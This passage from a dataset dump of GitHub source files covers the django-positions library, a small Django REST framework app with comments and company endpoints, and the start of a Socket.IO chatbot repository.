name='Mrs. None')\n self.assertEquals(self.t4.position, 2)\n self.t4.position = -2\n self.t4.save()\n self.assertEquals(self.t4.position, 1)\n actual_order = list(GenericThing.objects.order_by('position').values_list('name', flat=True))\n expected_order = [u'Second Generic Thing', u'Mrs. None', u'Mr. None']\n self.assertEqual(actual_order, expected_order)\n"
},
{
"alpha_fraction": 0.7104166746139526,
"alphanum_fraction": 0.71875,
"avg_line_length": 27.235294342041016,
"blob_id": "3e1a1b4ea83606847435bfd4445fbd69fa2bd63a",
"content_id": "a4baff432db4b66a8e4788cbddc233e67667be80",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 480,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 17,
"path": "/positions/examples/todo/models.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nimport positions\n\n\nclass Item(models.Model):\n description = models.CharField(max_length=50)\n\n # I'm calling the PositionField \"index\" to make sure any internal code that\n # relies on a PositionField being called \"position\" will break.\n # https://github.com/jpwatts/django-positions/pull/12\n index = positions.PositionField()\n\n objects = positions.PositionManager('index')\n\n def __unicode__(self):\n return self.description\n"
},
{
"alpha_fraction": 0.4642857015132904,
"alphanum_fraction": 0.6785714030265808,
"avg_line_length": 13,
"blob_id": "5b3a02462af9ce492e841b8fdeaf76f2ca4a61cd",
"content_id": "d4ef6ee9e27fc27a44b269155ab9df08039bdb98",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 28,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "Django==1.7.4\npsycopg2==2.6\n"
},
{
"alpha_fraction": 0.8888888955116272,
"alphanum_fraction": 0.8888888955116272,
"avg_line_length": 44,
"blob_id": "26cb4fbd768405ef0529a12207aec4b94abd8726",
"content_id": "4de1f3eb9f6d4b49df09cc20f3947939e0e8bd94",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 2,
"path": "/positions/__init__.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from positions.fields import PositionField\nfrom positions.managers import PositionManager\n"
},
{
"alpha_fraction": 0.592901885509491,
"alphanum_fraction": 0.6054279804229736,
"avg_line_length": 21.809524536132812,
"blob_id": "772ee42305e6e45127248b5bdd100d14491f27a1",
"content_id": "2e0c2ba09c362b3c4be90e6840813ccae4a37443",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 21,
"path": "/positions/examples/migration/migrations/0003_migrationtest_position.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport positions.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('migration', '0002_insert_test_data'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='migrationtest',\n name='position',\n field=positions.fields.PositionField(default=-1),\n preserve_default=True,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5627239942550659,
"alphanum_fraction": 0.5627239942550659,
"avg_line_length": 22.25,
"blob_id": "8fd6df389f7e63deb37c528cb80ee079f1bcd756",
"content_id": "f6c4f399fcbc8ad836f5530c1afa607cbd109e87",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 279,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 12,
"path": "/positions/examples/settings_mysql.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings import *\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'django_positions',\n 'USER': 'django_positions',\n 'PASSWORD': 'django_positions',\n }\n}\n\nLOGGING['handlers']['debug_log_file']['formatter'] = 'simple'\n"
},
{
"alpha_fraction": 0.7464028596878052,
"alphanum_fraction": 0.7553957104682922,
"avg_line_length": 29.94444465637207,
"blob_id": "dc039893513761d7c4ed90e216ddde97af45bd0d",
"content_id": "1a10010457d283854a7a2dd101bbddf1838a91a8",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 18,
"path": "/positions/examples/migration/models.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.db import models\n\nfrom positions.fields import PositionField\n\n\nclass MigrationTest(models.Model):\n name = models.CharField(max_length=80)\n age = models.IntegerField(null=True, blank=True)\n favorite_color = models.CharField(max_length=255, null=True, blank=True)\n position = PositionField(collection=('name', 'age'))\n\n def __unicode__(self):\n return self.name"
},
{
"alpha_fraction": 0.6763803958892822,
"alphanum_fraction": 0.6871165633201599,
"avg_line_length": 28.545454025268555,
"blob_id": "33086d821ffb2c2f20c1ca06cb07737e89820581",
"content_id": "a2a7da2d3a52fbd3db7d32ebbec7969997024d2c",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 652,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 22,
"path": "/positions/examples/migration/migrations/0002_insert_test_data.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport positions.fields\n\n\ndef add_test_data(apps, schema_editor):\n # We can't import the Person model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n MigrationTest = apps.get_model(\"migration\", \"MigrationTest\")\n test_record = MigrationTest.objects.create(name='Test Name', age=99, favorite_color='Red')\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('migration', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(add_test_data),\n ]\n\n\n"
},
{
"alpha_fraction": 0.7364400029182434,
"alphanum_fraction": 0.7377132773399353,
"avg_line_length": 37.5,
"blob_id": "4a6d94f16b016c6d73bffddc8b2eda391041ed3b",
"content_id": "d5677396030b5a725bef4bd639e3bc87be8db148",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3927,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 102,
"path": "/README.rst",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "================\nDjango Positions\n================\n\n\n.. image:: https://travis-ci.org/jpwatts/django-positions.svg?branch=master\n :target: https://travis-ci.org/jpwatts/django-positions\n\n\nThis module provides ``PositionField``, a model field for `Django`_ that allows\ninstances of a model to be sorted by a user-specified position. Conceptually,\nthe field works like a list index: when the position of one item is changed, the\npositions of other items in the collection are updated in response.\n\n\nUsage\n-----\n\nAdd a ``PositionField`` to your model; that's just about it.\n\nIf you want to work with all instances of the model as a single collection,\nthere's nothing else required. To create collections based on one or more\nfields on the model, specify the field names using the ``collection`` argument.\n\nThe apps in ``positions.examples`` demonstrate the ``PositionField`` API.\n\n\nIndices\n~~~~~~~\n\nIn general, the value assigned to a ``PositionField`` will be handled like a\nlist index, to include negative values. Setting the position to ``-2`` will\ncause the item to be moved to the second position from the end of collection --\nunless, of course, the collection has fewer than two elements.\n\nBehavior varies from standard list indices when values greater than or less than\nthe maximum or minimum positions are used. In those cases, the value is handled\nas being the same as the maximum or minimum position, respectively. ``None`` is\nalso a special case that will cause an item to be moved to the last position in\nits collection.\n\nBulk updates\n~~~~~~~~~~~~\n\nThe `PositionManager` custom manager uses `PositionQuerySet` to provide a\n`reposition` method that will update the position of all objects in the\nqueryset to match the current ordering. If `reposition` is called on the\nmanager itself, all objects will be repositioned according to the default\nmodel ordering.\n\nBe aware that, unlike repositioning objects one at a time using list indices,\nthe `reposition` method will call the `save` method of every model instance\nin the queryset.\n\nMany-to-many\n~~~~~~~~~~~~\n\nSpecifying a ``ManyToManyField`` as a ``collection`` won't work; use an\nintermediate model with a ``PositionField`` instead::\n\n class Product(models.Model):\n name = models.CharField(max_length=50)\n\n class Category(models.Model):\n name = models.CharField(max_length=50)\n products = models.ManyToManyField(Product, through='ProductCategory', related_name='categories')\n\n class ProductCategory(models.Model):\n product = models.ForeignKey(Product)\n category = models.ForeignKey(Category)\n position = PositionField(collection='category')\n\n class Meta(object):\n unique_together = ('product', 'category')\n\n\nMulti-table model inheritance\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nBy default, if a parent model has a position field that declares a collection,\nchild model instances are ordered independently. This behavior can be changed\nby specifying a `parent_link` argument identifying the name of the one-to-one\nfield linking the child model to the parent. If `parent_link` is set, all subclass\ninstances will be part of a single sequence in each collection.\n\n\nLimitations\n-----------\n\n* Unique constraints can't be applied to ``PositionField`` because they break\n the ability to update other items in a collection all at once. This one was\n a bit painful, because setting the constraint is probably the right thing to\n do from a database consistency perspective, but the overhead in additional\n queries was too much to bear.\n\n* After a position has been updated, other members of the collection are updated\n using a single SQL ``UPDATE`` statement, this means the ``save`` method of the\n other instances won't be called. As a partial work-around to this issue,\n any ``DateTimeField`` with ``auto_now=True`` will be assigned the current time.\n\n\n.. _`Django`: http://www.djangoproject.com/\n"
},
{
"alpha_fraction": 0.6559139490127563,
"alphanum_fraction": 0.6559139490127563,
"avg_line_length": 30,
"blob_id": "be5527ec1e4b4cd326d2bee5edd47384062f295c",
"content_id": "c0dab5d0d337004c2dfe0b47a807fe87d72361cd",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 3,
"path": "/positions/examples/ci_settings_mysql.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings_mysql import *\n\nDATABASES['default'].update({'USER': 'root', 'PASSWORD': ''})\n"
}
] | 13 |
AlejandroOnofre/djangoApp | https://github.com/AlejandroOnofre/djangoApp | 253d2aa899a04d6244a4607d8db58d031bf9fa86 | 42f5201a71567ebf8cd3fadb0b068391f3548c9a | 0cdcab692bca726b461d0a614cf13eda73a543ec | refs/heads/master | 2020-05-04T18:09:31.231123 | 2019-04-05T00:34:05 | 2019-04-05T00:34:05 | 179,342,173 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.837837815284729,
"alphanum_fraction": 0.837837815284729,
"avg_line_length": 25.285715103149414,
"blob_id": "6a6f081efae1c1a266dd6e8db60917ce1e89ce3b",
"content_id": "7fad2ff2c8d362a2704f19379e4782a9ba17e58a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 7,
"path": "/general/tests.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase\n\n"
},
{
"alpha_fraction": 0.7635658979415894,
"alphanum_fraction": 0.7829457521438599,
"avg_line_length": 31.375,
"blob_id": "92175fb05245fe390a77eb2e1ca3e1e184a59c2a",
"content_id": "cef46aa2337ea827996643414ac29b3e05749df0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 8,
"path": "/company/models.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\n\n# Create your models here.\nclass Company(models.Model):\n\tname = models.CharField(max_length=250)\n\tphone_number = models.CharField(max_length=15)\n\taddress = models.TextField(blank=True, null=True)"
},
{
"alpha_fraction": 0.7808219194412231,
"alphanum_fraction": 0.7808219194412231,
"avg_line_length": 24.823530197143555,
"blob_id": "c041452c71af737557bfe62ebab6e47b3dab152f",
"content_id": "a59d5633ccbebca4ffd9bf32e0218370df7bd3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 17,
"path": "/general/urls.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url, include\nfrom rest_framework import routers\n\nfrom general.views import UserViewSet#, ProfileViewSet\nfrom comments.views import CommentsViewSet\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', UserViewSet)\nrouter.register(r'comments', CommentsViewSet, base_name=\"comments\")\n#router.register(r'profile', ProfileViewSet)\n\napp_name='general'\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n]"
},
{
"alpha_fraction": 0.7439886927604675,
"alphanum_fraction": 0.7623762488365173,
"avg_line_length": 29.60869598388672,
"blob_id": "cad6e3462637d04629bb66f0818a1170ac1c2d1d",
"content_id": "d5316bc0d5b667e2660426c2bbc4a7871b4fd006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 23,
"path": "/company/tests.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "import json\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase\nfrom .models import Company\n\nfrom .serializers import CompanySerializer\n# Create your tests here.\n\nclass CompanyViewSetTestCase(APITestCase):\n\turl = 'http://127.0.0.1:8000/company/'\n\n\tdef test_company_get(self):\n\n\t\tnew_user = User.objects.create(username = \"newuser\", email = \"[email protected]\", password = \"newpass\")\n\t\tnew_token = Token.objects.create(user=new_user)\n\n\t\tself.client.credentials(HTTP_AUTHORIZATION='Bearer ' + new_token.key)\n\n\t\tresponse = self.client.get(self.url)\n\t\tself.assertEqual(200, response.status_code)\n\t\t\n"
},
{
"alpha_fraction": 0.7607973217964172,
"alphanum_fraction": 0.7607973217964172,
"avg_line_length": 22.230770111083984,
"blob_id": "487ac7945d062967270b30eb6b3fef598a2c69e0",
"content_id": "e86512a5934b20e2107a69995d5a91d177188aed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 13,
"path": "/comments/urls.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from comments.views import CommentsViewSet\nfrom rest_framework import routers\nfrom django.conf.urls import url, include\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'comments', CommentsViewSet, base_name=\"comments\")\n\napp_name = 'comments'\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n]"
},
{
"alpha_fraction": 0.5277777910232544,
"alphanum_fraction": 0.5902777910232544,
"avg_line_length": 17,
"blob_id": "ab1be923d361c10ad1b024452f00f3737bcde695",
"content_id": "22644115d2623ee0e9883de5cf1e77c7186a782d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 288,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 16,
"path": "/general/migrations/0003_delete_profile.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2 on 2019-04-04 23:41\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('general', '0002_profile_user'),\n ]\n\n operations = [\n migrations.DeleteModel(\n name='Profile',\n ),\n ]\n"
},
{
"alpha_fraction": 0.8097251653671265,
"alphanum_fraction": 0.8097251653671265,
"avg_line_length": 32.85714340209961,
"blob_id": "571e0cdd5a004e427a61e5902507316367080d07",
"content_id": "07dfa39058c4d7115f0716465de15cdf288c7f3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 14,
"path": "/general/views.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom rest_framework import viewsets\nfrom general.serializers import UserSerializer#, ProfileSerializer\n#from .models import Profile\n# Create your views here.\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n#class ProfileViewSet(viewsets.ModelViewSet):\n\t#queryset = Profile.objects.all()\n\t#serializer_class = ProfileSerializer"
},
{
"alpha_fraction": 0.7773584723472595,
"alphanum_fraction": 0.7773584723472595,
"avg_line_length": 25.200000762939453,
"blob_id": "64532cff47ac45bb34d2d230e12a321df84c8b7a",
"content_id": "592e4d064be75e2d4499cda0f501ae88429bc9ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 10,
"path": "/comments/serializers.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from .models import Comments\nfrom rest_framework import serializers\n\nfrom general.serializers import UserSerializer\n\nclass CommentsSerializer(serializers.HyperlinkedModelSerializer):\n\n\tclass Meta:\n\t\tmodel = Comments\n\t\tfields = ('id', 'user', 'title', 'comment')\n\t "
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.7765957713127136,
"avg_line_length": 30.44444465637207,
"blob_id": "00e82dbdabbe2320b9919cd972adf6b51bd56685",
"content_id": "a0da2e76ea237ddc71b1bf089d6b7f3c6e85a422",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 9,
"path": "/comments/models.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Comments(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user')\n\n\ttitle = models.CharField(max_length=250)\n\tcomment = models.TextField()"
},
{
"alpha_fraction": 0.8175895810127258,
"alphanum_fraction": 0.8175895810127258,
"avg_line_length": 29.799999237060547,
"blob_id": "62d69703191f08860e32d08299c4b1ad00f50e36",
"content_id": "423f3bac9b5928b1bde3ac547c6c68ac1b7f9482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 10,
"path": "/comments/views.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Comments\nfrom rest_framework import viewsets\nfrom comments.serializers import CommentsSerializer \n\n\n# Create your views here.\nclass CommentsViewSet(viewsets.ModelViewSet):\n queryset = Comments.objects.all()\n serializer_class = CommentsSerializer"
},
{
"alpha_fraction": 0.7631027102470398,
"alphanum_fraction": 0.7631027102470398,
"avg_line_length": 25.5,
"blob_id": "51bd19b1f744e783bb726f2f8628ca82bc769d49",
"content_id": "75713549ebeb95f42930ad4bdb1bc3501f32223f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 18,
"path": "/general/serializers.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nfrom company.models import Company\n#from .models import Profile\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n\tclass Meta:\n\t model = User\n\t fields = ('url', 'username', 'email', 'is_staff')\n\n\n#class ProfileSerializer(serializers.HyperlinkedModelSerializer):\n\t#company = serializers.StringRelatedField(many=True)\n\n\t#class Meta:\n\t\t#model = Profile\n\t\t#fields = ('company')\n"
},
{
"alpha_fraction": 0.8166666626930237,
"alphanum_fraction": 0.8166666626930237,
"avg_line_length": 32.44444274902344,
"blob_id": "9ebe7cab5b5275db2d3197366fbf46c32e2b9da8",
"content_id": "32182d29c70fec6c0ee7fad79b62886fdb5ac0a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 300,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/company/views.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Company\nfrom rest_framework import viewsets\nfrom company.serializers import CompanySerializer \n# Create your views here.\n\nclass CompanyViewSet(viewsets.ModelViewSet):\n queryset = Company.objects.all()\n serializer_class = CompanySerializer"
},
{
"alpha_fraction": 0.7791519165039062,
"alphanum_fraction": 0.7791519165039062,
"avg_line_length": 27.350000381469727,
"blob_id": "7207451dd5dea1b6dd1601aa175c91bdb9eae377",
"content_id": "511addadc56813695e02fa646caae515b51bd8fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 566,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 20,
"path": "/general/models.py",
"repo_name": "AlejandroOnofre/djangoApp",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom company.models import Company\n\n# Create your models here.\n#class Profile(models.Model):\n\t#user = models.OneToOneField(User, on_delete=models.CASCADE)\n\t#company = models.OneToOneField(Company, on_delete=models.CASCADE)\n\n\n\n#@receiver(post_save, sender= User)\n#def create_or_update_user(sender, instance, created, **kwargs):\n\t#if created:\n\t\t#Profile.objects.create(user=instance)\n\n\t#instance.profile.save()"
}
] | 13 |
oscarlaureano/datastructuresinpython | https://github.com/oscarlaureano/datastructuresinpython | 736939acd552e46cf02b55d1205a8b7b811a5daa | 77ccb5f0121017a47fb054f9c2ac4e2bb201e6d2 | 0b20b6300d513074f4ef5328d913a06a22f9935b | refs/heads/master | 2020-04-17T15:51:52.702068 | 2019-01-20T22:33:26 | 2019-01-20T22:33:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5206215381622314,
"alphanum_fraction": 0.5319393873214722,
"avg_line_length": 24.075000762939453,
"blob_id": "3f09f84a2ae1d730a8730f601a6c22bc9f05529d",
"content_id": "0b7f240ba4dd71272f81d57fef9a8bc38f6d9996",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5227,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 200,
"path": "/Tarea1Compis.py",
"repo_name": "oscarlaureano/datastructuresinpython",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nTarea 1\r\n\r\nDesarrolla y/o documenta una implementación apropiada para las siguientes clases: STACK (lifo), \r\nQUEUE (fifo), TABLE/HASH/DICTIONARY (order),.. (* las puedes implementar “desde 0” o usar alguna \r\nlibrería “pública” *) Las clases deben contener métodos para soportar las principales operaciones \r\nde acceso y manipulación (clásicas). \r\n\"\"\"\r\n\r\n# ---------------------------------------------------------------------\r\n# ---------------------------- Stack ----------------------------------\r\n# ---------------------------------------------------------------------\r\n\r\n# Implemented with a list, where the first element\r\n# is considered to be the Top of the stack\r\n\"\"\" Top\r\n\r\n 10\r\n [10, 12, 9, 1] => 12\r\n 9\r\n 1\r\n\r\n Bottom \r\n\"\"\"\r\n# Methods:\r\n# __init__ : Creates an empty stack\r\n# push : Pushes the element at the beginning of the list (Top of the stack)\r\n# pop : Returns and pops the element at the Top of the stack (None if the stack is empty)\r\n# peek: Returns the element at the Top of the stack (None if the stack is empty)\r\n# isEmpty: Returns true when stack is empty, false otherwise\r\n# print: Displays all the elements of the stack\r\n\r\n\r\nclass Stack:\r\n def __init__(self): # Init as an empty stack\r\n self.list = []\r\n\r\n def push(self, element): # Pushing the element at the beginning of the list (Top)\r\n self.list.insert(0, element)\r\n\r\n def pop(self): # Returns and pops the element at the Top of the stack\r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list.pop(0)\r\n\r\n def peek(self): # Returns the element at the Top of the stack \r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list[0]\r\n\r\n def isEmpty(self): # Returns true when stack is empty, false otherwise\r\n return self.list == []\r\n \r\n def print(self): # Displays all the elements of the stack\r\n if self.isEmpty():\r\n print (\"Stack Empty\")\r\n else:\r\n for elem in self.list:\r\n print(elem)\r\n \r\n# Implementation of the stack: \r\n\r\n# Creating the stack\r\ns = Stack()\r\n\r\n# Pushing three numbers in\r\ns.push(20)\r\ns.push(6)\r\ns.push(10)\r\n\r\n# Displaying the stack\r\ns.print()\r\n\r\n# Showing the peek only\r\nprint(s.peek())\r\n\r\n# Popping the top element\r\nprint(s.pop())\r\n\r\n# Asking if the stack is empty\r\nprint(s.isEmpty())\r\n\r\n# Popping two more elements\r\nprint(s.pop())\r\nprint(s.pop())\r\n\r\n# Asking if the stack is empty\r\nprint(s.isEmpty())\r\n\r\n\r\n# ---------------------------------------------------------------------\r\n# ---------------------------- QUEUE ----------------------------------\r\n# ---------------------------------------------------------------------\r\n\r\n# Implemented with a list where the first element is the front \r\n# and the last is the back\r\n\"\"\" \r\n Front [1, 40, 23, 19, 12] Back \r\n\"\"\"\r\n\r\n# Methods:\r\n# __init__ : Creates an empty stack\r\n# insert : Inserts the element at the back of the queue\r\n# remove : Removes and returns the element at the front of the queue (None if the queue is empty)\r\n# front: Returns the element at the front of the queue (None if the queue is empty)\r\n# isEmpty: Returns true when the queue is empty, false otherwise\r\n# print: Displays all the elements of the queue\r\n\r\nclass Queue:\r\n def __init__(self):\r\n self.list = []\r\n \r\n def insert(self, element):\r\n self.list.append(element)\r\n\r\n def remove(self):\r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list.pop(0)\r\n \r\n def front(self):\r\n if self.isEmpty():\r\n return None\r\n else:\r\n return self.list[0]\r\n\r\n def isEmpty(self): \r\n return self.list == []\r\n \r\n def print(self):\r\n if self.isEmpty():\r\n print(\"Empty Queue\")\r\n else:\r\n print(self.list)\r\n\r\n# Implementation of the queue:\r\n\r\n# Creating an empty queue\r\nq = Queue()\r\n\r\n# Inserting three elements\r\nq.insert(10)\r\nq.insert(20)\r\nq.insert(35)\r\n\r\n# Displaying the front\r\nprint(q.front())\r\n\r\n# Displaying all the elements\r\nq.print()\r\n\r\n# Asking if the queue is empty\r\nprint(q.isEmpty())\r\n\r\n# Removing one element\r\nprint(q.remove())\r\n\r\n# Displaying all the elements\r\nq.print()\r\n\r\n# Removing the rest of the elements\r\nprint(q.remove())\r\nprint(q.remove())\r\n\r\n# Asking if the queue is empty\r\nprint(q.isEmpty())\r\n\r\n\r\n# ---------------------------------------------------------------------\r\n# -------------------- TABLE/HASH/DICTIONARY -------------------------\r\n# ---------------------------------------------------------------------\r\n\r\n# Using the existing dictionary in python\r\n\r\n# Creating a dictionary:\r\nphones = {'elda' : 911, 'wicho' : 92102, 'roque' : 133212}\r\n\r\n# Inserting new elements:\r\nphones['yolanda'] = 738923\r\n\r\n# Deleting elements:\r\ndel phones['roque']\r\n\r\n# Checkig if it exists:\r\n'roque' in phones\r\n'elda' in phones\r\n\r\n# Getting one number by its key:\r\nphones['elda']\r\n\r\n# Provides the list of all the keys sorted:\r\nsorted(phones)\r\n\r\n# Provides the list of all the keys in insertion order:\r\nlist(phones)"
}
] | 1 |
gormlabenz/chat-textblob | https://github.com/gormlabenz/chat-textblob | 0bc84a1f4d3f0b53cd324c7b3e3605250ed78a76 | 7407635f64a88a0b88058c41a1b9fc0656a76354 | 426f9f9018bc61c9ef3d4db878fe19dd6813857f | refs/heads/master | 2023-01-24T20:55:57.101552 | 2020-11-21T17:08:50 | 2020-11-21T17:08:50 | 314,848,162 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6579710245132446,
"alphanum_fraction": 0.6579710245132446,
"avg_line_length": 18.11111068725586,
"blob_id": "4e280bc41dba633c3b9bc77849c5234b9e0b7564",
"content_id": "4163194f97eff02a7478cef2ed7771cf2681b099",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 18,
"path": "/app/events.py",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
"text": "from app import *\n\[email protected]\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n\[email protected]\ndef clientToServer(sid, data):\n print(\"message \", data['text'])\n response = chatbot.chat(data['text'])\n sio.emit(\"serverToClient\", response)\n print(\"response \", response)\n\n\[email protected]\ndef disconnect(sid):\n print(\"disconnect \", sid)\n\n"
},
{
"alpha_fraction": 0.4485049843788147,
"alphanum_fraction": 0.6976743936538696,
"avg_line_length": 15.722222328186035,
"blob_id": "278dcbcb1d5db1359501af6e49004b86061b9c6f",
"content_id": "c95eb08652133698e85b9ed89b41ea3531684de1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 18,
"path": "/requirements.txt",
"repo_name": "gormlabenz/chat-textblob",
"src_encoding": "UTF-8",
